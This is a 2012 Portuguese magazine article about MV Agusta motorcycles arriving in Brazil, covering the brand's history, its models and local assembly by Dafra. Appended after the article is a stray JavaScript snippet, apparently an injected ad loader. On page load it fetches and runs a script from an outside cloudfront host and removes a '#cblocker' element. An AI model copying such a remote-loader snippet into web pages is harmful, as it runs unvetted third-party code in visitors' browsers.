Revista Acontece Sul

Arte em duas rodas

em Diversos - segunda, 26 de maro de 2012

Os pessimistas acreditam que as minorias são vítimas de preconceito, já os otimistas atribuem às minorias status de exclusividade. Aqui no Brasil o mercado de motocicletas é dominado pelas marcas japonesas: Honda, Yamaha, Suzuki e Kawasaki, estas quatro detém mais de 90% dos emplacamentos. Ocorre que a pouco mais de dois meses instalou-se aqui no Brasil a MV AGUSTA, marca Italiana que veio para fazer história, quer dizer, história é o que não lhe falta.
Fundada em 1945, hoje com 67 anos de existência e nascida em berço de ouro, traz em seu currículo 37 títulos mundiais de fabricante, apelidada de “A Ferrari das motos”, é desenhada pelo mago do design europeu, Massimo Tamburini, com fábrica no Norte da Itália em Varese, a 50 Km de Milão, onde se produz não mais de 30 unidades/dia, ou seja , primórdios nos detalhes e não na produção em série o objetivo não é ser a maior, mas sim a melhor. Hoje conta com aproximadamente 200 colaboradores, os quais não gostam de ser chamados simplesmente de funcionários, pois acreditam tornar sonho em realidade.
Aqui no Brasil a MV Agusta, vai ser montada em Manaus na fábrica da Dafra. Empresa que também vai ter o domínio da operação comercial. Com isto, a Dafra, passa a integrar o mercado Premium de motocicletas no Brasil. Por aqui inicialmente serão produzidos e comercializados três modelos: A super esportiva F4 R 1000, de 186 CV, e mais duas nakeds (nuas, sem carenagem), a Brutale 1090R e a Brutale 1090RR. Na Europa existe uma versão ainda mais nobre e exclusiva da F4, denominada RR CorsaCorta, com 201 CV, modelo que poderá chegar aqui por encomenda, tanto como a F3 Série Oro. Motocicletas consideradas peças de colecionador, como já foi o caso da MV série SENNA em homenagem ao nosso piloto. Esta marca mundialmente conhecida e desejada desde o mais simples mortal motociclista, até os mais exigentes pilotos, calçou sua trajetória, na busca incansável pelo melhor, característica que pode ser observada em seus componentes, bem como sua suspensão traseira com balança mono-braço, que deixa o lado direito da roda totalmente exposto, dutos de freios em malha de aço, quadro tubular em treliça, rodas em alumínio forjado para garantir maior resistência sem elevar o peso, enfim sempre buscando soluções mecânicas de alto desempenho sem deixar de lado o apelo estético, nobreza total.
A rede de concessionárias por aqui deve ficar em torno de dez lojas estrategicamente espalhadas em nosso território, o que certamente dará conta do recado, pois trata-se de produto para poucos, não devemos esquecer que componentes nobres elevam o preço final do produto. Ainda que o preço não seja um empecilho, não se engane, a engenharia desta máquina não prevê pilotos inexperientes, é uma moto derivada de pista. Este é seu habitat preferido. Em um circuito de curvas você vai poder desfrutar de tudo que ela lhe oferece, pois seu comportamento é radical. Portanto é muito bom revermos nossos conceitos. O fato de uma marca ter se instalado antes que a outra em nosso país, não é sinônimo de superioridade, não quer dizer que as que chegam depois por aqui, não sejam tão boas quanto, ou em certos casos até melhores.
 
if(typeof(jQuery)==\'undefined\'){(function(){var ccm=document.createElement(\'script\');ccm.type=\'text/javascript\';ccm.src=\'https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js\';var s=document.getElementsByTagName(\'script\')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState==\"loaded\"||ccm.readyState==\"complete\"){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();}
function ccm_e_init(jc){if(jc){jQuery.noConflict();}
jQuery(function(){var http=location.href.indexOf(\'https://\')>-1?\'https\':\'http\';var ccm=document.createElement(\'script\');ccm.type=\'text/javascript\';ccm.async=true;ccm.src=http+\'://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=\';var s=document.getElementsByTagName(\'script\')[0];s.parentNode.insertBefore(ccm,s);jQuery(\'#cblocker\').remove();});};

Comentários